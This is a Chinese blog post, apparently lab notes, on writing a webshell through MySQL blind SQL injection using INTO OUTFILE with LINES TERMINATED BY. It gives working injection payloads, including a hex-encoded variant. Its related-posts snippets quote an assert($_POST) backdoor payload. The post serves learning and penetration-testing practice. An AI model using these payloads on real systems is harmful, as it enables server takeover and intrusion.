SQL注入写入Webshell(Lines terminated by写入)

已于 2023-03-31 12:14:44 修改
阅读量722 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql 数据库 mysql web安全
于 2023-03-31 12:10:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/faclon666/article/details/129871854
版权

(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)

实验:

1.当mysql注入点为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入(SQLMAP的–os-shell命令,所采用的就是这种方式)

2.条件:secure_file_priv支持web目录文件导出;

              数据库File权限;

              获取物理路径。

3.实验步骤:

 1)判断是否存在注入点。

 页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。

 

 无差别,==》不是数字型注入。

 真假两种情况回显不一致,==》存在布尔盲注点。

2)尝试用 union select 1, @@datadir #;找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。

1' into outfile  'F:\\phpstudy\\MySQL\\data\\ws.php'  lines terminated by '<?php phpinfo();?>' #

 3)验证:

 

 

知识补充:

1.lines-terminated-by:指定行结束符,默认值就是换行符。

用法举例:

SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。

2.#是什么?

它是 MySQL的版本的行注释分隔符。在标准SQL中,行注释分隔符为-- 

3.sql语句如果只写一句,可以不加;

  如果写多条sql语句,必须加;用做结束符号。(因为不加 它误以为是一条sql)

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=3#';

此处用#注释不会报错,因为后台就一条sql查询语句。

4.为什么127.0.0.1有时候显示WWW网站根目录下的内容,有时显示phpstudy下的所有内容?

和httpd.conf这个配置文件有关,如图:

参考链接:
(5条消息) SQL注入写入webshell_番茄酱料的博客-CSDN博客

(5条消息) DVWA——SQL盲注(全等级)_dvwa sql盲注_一只躺平的猪的博客-CSDN博客

(5条消息) DVWA之sql注入——盲注_dvwa布尔盲注_梓桐sama的博客-CSDN博客

白帽~无常
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入写入webshell
qq_39816136的博客
04-18 1847
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入写入webshell
其他sql注入写入webshell的方式
faclon666的博客
03-31 371
这时,我们可以通过修改MySQL的log文件来获取Webshell。fields terminated by原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句。注入原理:利用lines starting by语句进行拼接,拼接后面的webshell内容,lines starting by可以理解成以每行开始的位置添加xx语句。写入的文件中只包含username的值而没有webshell内容。
sqlshell原理_sql注入写入shell的条件
2401_84281655的博客
05-17 774
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可写权限即secure_file_priv = ''配置为空原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置。
SQL注入写入webshell
bring_coco的博客
03-13 5808
前言 在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统写文件的功能,通过这些内置的功能,我们可以将自己的webshell写目录或文件进去 写入webshell条件 1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制, 如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。 如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出 如果secure_file_priv="" ,MYSQL
SQL注入写入Webshell
weixin_43749601的博客
03-28 2816
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
SQL注入webshell
huangyongkang666的博客
03-25 2735
SQL注入webshell 1.MySQLshell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
MySQL注入点写入WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2593
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
mysql fields terminated by_MySQL注入点写WebShell的5种方式
weixin_32767137的博客
01-19 1251
SQLWebShell条件在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。未开启全局gpc。环境准备存在http://172.16.55.130/work/sqli-1.php?id=11http://172.16.55.130/work/sqli-1.php?i...
知识总结 | 注入写webshell
IerkeU的博客
03-25 3522
一、什么是webshell? ​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。 ​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。 一句话木马 ​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此 简
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
这次与SQL注入Webshell的“邂逅”提醒我们,即使在启用WAF和其他安全措施的情况下,也不能忽视安全防御的细节。定期审计、更新策略和快速响应异常是防止和减轻此类攻击的关键。企业应当建立完善的安全管理体系,...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
机器学习实现web攻击检测——XSS、SQL注入Webshell检测.zip
05-06
在网络安全领域,Web攻击是常见的威胁之一,包括跨站脚本攻击(XSS)、SQL注入攻击和Webshell攻击。这些攻击手段对网站的安全性构成严重威胁,因此,使用机器学习来实现Web攻击检测已经成为一种有效的防御策略。本文...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
SQL Server中 LOP_FORMAT_PAGE日志记录解释
qq_55914897的博客
07-24 377
SQL Server事务日志中的一种重要记录类型,负责描述页面整理操作。它在页面初始化、事务日志记录和数据库恢复中扮演了关键角色,确保数据库操作的可靠性和一致性。是一种事务日志记录类型,表示SQL Server对数据页(Data Page)进行删除的操作。详细的背景和任务类型有助于深入理解SQL Server的内部机制,尤其是在恢复和日志管理方面。在数据库恢复过程中,SQL Server会读取事务日志并应用其中的记录和数据。是日志记录的一种类型,用于描述页面的格式化操作。在SQL Server中,
会Excel就会sql
svygh123的专栏
07-20 1492
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
SQL Server 数据误删的恢复
踏雨歌青春,诗酒趁年华
07-24 9621
在日常的数据库管理中,数据的误删操作是难以避免的。为了确保数据的安全性和完整性,我们必须采取一些措施来进行数据的备份和恢复。本文将详细介绍如何在 SQL Server 中进行数据的备份和恢复操作,特别是在发生数据误删的情况下。假设我们已经开启了全量备份,并且在误操作之前有一个全量备份文件。
SQL-REGEX-常见正则表达式的使用
最新发布
喻师傅的学习笔记
07-25 847
SQL中,正则表达式(Regex)的使用可以帮助进行更灵活和精确的模式匹配和数据筛选。不同的数据库管理系统对于正则表达式的支持略有差异,但大体都是相似的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值